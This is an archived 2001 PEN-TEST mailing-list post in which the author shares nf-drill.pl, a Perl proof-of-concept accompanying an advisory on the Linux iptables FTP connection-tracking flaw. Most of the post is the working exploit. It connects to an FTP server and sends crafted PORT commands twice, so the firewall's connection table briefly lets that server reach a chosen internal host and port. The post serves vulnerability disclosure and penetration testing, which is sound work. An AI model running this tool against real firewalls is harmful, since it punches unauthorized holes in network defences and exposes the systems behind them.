[PEN-TEST] linux iptables ftp port command -- demo tool

From: Cristiano Lincoln Mattos (lincolnat_private)
Date: Mon Apr 16 2001 - 16:43:16 PDT

  • Next message: Jens Knoell: "Re: [PEN-TEST] linux iptables ftp port command -- demo tool"

    Hi,
    
    	The advisory on this should be going on Bugtraq, for
    whoever is interested -- this is a little tool that i wrote
    for it, since this is pen-test :) Curious thing is I actually
    discovered this in a pen-test.
    
    Cristiano Lincoln Mattos, CISSP, SSCP
    CESAR - Centro de Estudos e Sistemas Avançados do Recife
    
    
    #!/usr/bin/perl
    #
    # nf-drill.pl --- "Drill" holes open in Linux iptables connection table
    # Author: Cristiano Lincoln Mattos <lincolnat_private>, 2001
    #
    # Advisory: http://www.tempest.com.br/advisories/linux-iptables
    #
    #      Tempest Security Technologies - a business unit of:
    #    CESAR - Centro de Estudos e Sistemas Avancados do Recife
    #
    # This code is licensed under the GPL.
    #
    
    use Socket;
    use Getopt::Long;
    use strict;
    
    # Option variables
    my $server;
    my $serverport = 21;
    my $host;
    my $port;
    my $verbose = 0;
    
    # Print function
    sub out {
    	my ($level,$text) = @_;
    	if (!$level || ($level && $verbose)) { print "$text"; }
    }
    
    my $opt = GetOptions("server=s" => \$server,
    		     "serverport=s" => \$serverport,
    		     "host=s" => \$host,
    		     "port=i" => \$port,
    		     "verbose" => \$verbose);
    
    if ($server eq "" || $host eq "" || $port eq "" || $port < 0 || $port > 65535) {
    	print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n";
    	print "   - server: specifies the FTP server (IP or hostname) to connect to\n";
    	print "   - serverport: specifies the port of the FTP server -- default: 21\n";
    	print "   - host: the IP of the target to open in the connection table\n";
    	print "   - port: the port of the target to open in the connection table\n";
    	print "   - verbose: sets verbose mode\n";
    	exit(0);
    }
    
    print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n";
    print " Tempest Security Technologies\n\n";
    
    # For the meanwhile, expecting an IP
    my @ip = split(/\./,$host);
    my $str = "PORT " . $ip[0] . "," . $ip[1] . "," . $ip[2] . "," . $ip[3] . "," . ($port >> 8) . "," . ($port %
    256) . "\r\n";
    
    # Socket init
    my $ipn = inet_aton($server);
    if (!$ipn) {
    	out(0," Error: could not convert $server\n");
    	exit(0);
    }
    
    my $sin = sockaddr_in($serverport,$ipn);
    socket(Sock,PF_INET,SOCK_STREAM,6);
    
    if (!connect(Sock,$sin)) {
    	out(0," Error: could not connect to $server:$serverport.\n");
    	exit(0);
    }
    out(0," - Connected to $server:$serverport\n");
    
    my $buf;
    recv(Sock,$buf,120,0); chomp($buf);
    out(1," - RECV: $buf\n");
    
    # First send a dummy one, just to establish the connection in the iptables logic
    send(Sock,$str,0);
    out(1," - SEND: $str");
    recv(Sock,$buf,120,0); chomp($buf);
    out(1," - RECV: $buf\n");
    
    # Now, send the one that will insert itself into the connection table
    send(Sock,$str,0);
    out(1," - SEND: $str");
    recv(Sock,$buf,120,0); chomp($buf);
    out(1," - RECV: $buf\n");
    
    out(0," * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n");
    out(0," - Closing connection to $server:$serverport.\n\n");
    close(Sock);
    



    This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 17:09:38 PDT